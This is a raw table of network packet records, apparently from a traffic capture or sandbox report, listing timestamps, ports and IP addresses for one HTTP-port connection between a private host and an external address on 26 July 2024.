Jul 26, 2024 18:56:46.787367105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.787379980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.787477970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.787477970 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.788510084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.788522005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.788563013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.789701939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.789714098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.789721966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.789750099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.789783001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.790923119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.790935993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.790972948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.790998936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.792154074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.792174101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.792200089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.792232990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.793332100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.793344021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.793375015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.793404102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.794523001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.794536114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.794545889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.794573069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.794610023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.795906067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.795917034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.795947075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.795970917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.797051907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.797063112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.797097921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.797122002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.798130989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.798142910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.798171997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.798192024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.799228907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.799241066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.799264908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.799292088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.800079107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.800091028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.800101042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.800127983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.800148010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.800148010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.801043987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.801058054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.801085949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.801107883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.801995993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.802006960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.802046061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.802922010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.802933931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.802962065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.802987099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.804003954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.804014921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.804023981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.804047108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.804066896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.804872990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.804884911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.804907084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.804939032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.805850029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.805860996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.805886030 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.805905104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.806775093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.806812048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.807265043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.807276011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.807301998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.807322025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.808319092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.808330059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.808339119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.808362961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.808387041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.809376955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.809389114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.809417009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.809434891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.809988976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.809999943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.810028076 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.810748100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.810759068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.810787916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.811570883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.811583042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.811611891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.811631918 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.812355042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.812367916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.812376022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.812398911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.812417984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.812417984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.813230038 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.813241959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.813266039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.813283920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.813982964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.813993931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.814013958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.814029932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.814726114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.814738035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.814763069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.814780951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.815501928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.815514088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.815522909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.815543890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.815562963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.816324949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.816335917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.816359997 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.816380978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.817140102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.817151070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.817177057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.817193031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.817826986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.817837954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.817857981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.817881107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.818675995 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.818686962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.818712950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.818732977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.819264889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.819277048 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.819286108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.819307089 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.819324017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.863928080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.863949060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.863960981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.864008904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.864099979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.864620924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.864634037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.864670992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.864702940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.865540028 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.865551949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.865593910 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.865623951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.866695881 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.866708994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.866746902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.866777897 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.867391109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.867404938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.867456913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.867798090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.867810011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.867820978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.867854118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.867885113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.868594885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.868607044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.868652105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.869164944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.869177103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.869220972 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.870079994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.870093107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.870131016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.870170116 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.870796919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.870809078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.870819092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.870850086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.870888948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.871527910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.871539116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.871573925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.871607065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.872536898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.872550011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.872612000 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.872651100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.873465061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.873512030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.873550892 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.873584032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.874191999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.874205112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.874248981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.874275923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.875068903 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.875082970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.875093937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.875123978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.875160933 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.875895023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.875906944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.875946999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.875986099 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.876562119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.876574039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.876617908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.877327919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.877341986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.877391100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.877439976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.878079891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.878092051 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.878101110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.878123999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.878148079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.878940105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.878952026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.878983974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.879012108 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.879693031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.879705906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.879730940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.879760027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.880446911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.880459070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.880520105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.880520105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.881253004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.881264925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.881299973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.881328106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.882055044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.882066965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.882076979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.882086992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.882114887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.882138014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.882847071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.882858992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.882884979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.882906914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.883594036 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.883625031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.883655071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.883678913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.884347916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.884393930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.884797096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.884809017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.884840965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.884860992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.885564089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.885576963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.885586977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.885612011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.885639906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.886375904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.886387110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.886413097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.886440992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.887142897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.887155056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.887182951 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.887202024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.887945890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.887964010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.887998104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.888042927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.888825893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.888839006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.888911009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.888911009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.889514923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.889525890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.889539003 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.889564991 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.889591932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.890304089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.890316010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.890346050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.890389919 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.891086102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.891098022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.891129971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.891159058 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.891871929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.891885996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.891920090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.891947985 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.892652035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.892663002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.892673016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.892707109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.892724037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.893526077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.893537998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.893579006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.893611908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.894402981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.894416094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.894459963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.894484043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.895049095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.895062923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.895096064 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.895126104 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.895818949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.895832062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.895870924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.895895004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.896631956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.896646976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.896657944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.896682024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.896712065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.897394896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.897408009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.897437096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.897465944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.898247004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.898262024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.898296118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.898323059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.898971081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.898984909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:46.899014950 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:46.899038076 CEST	49757	80	192.168.2.4	147.45.44.104
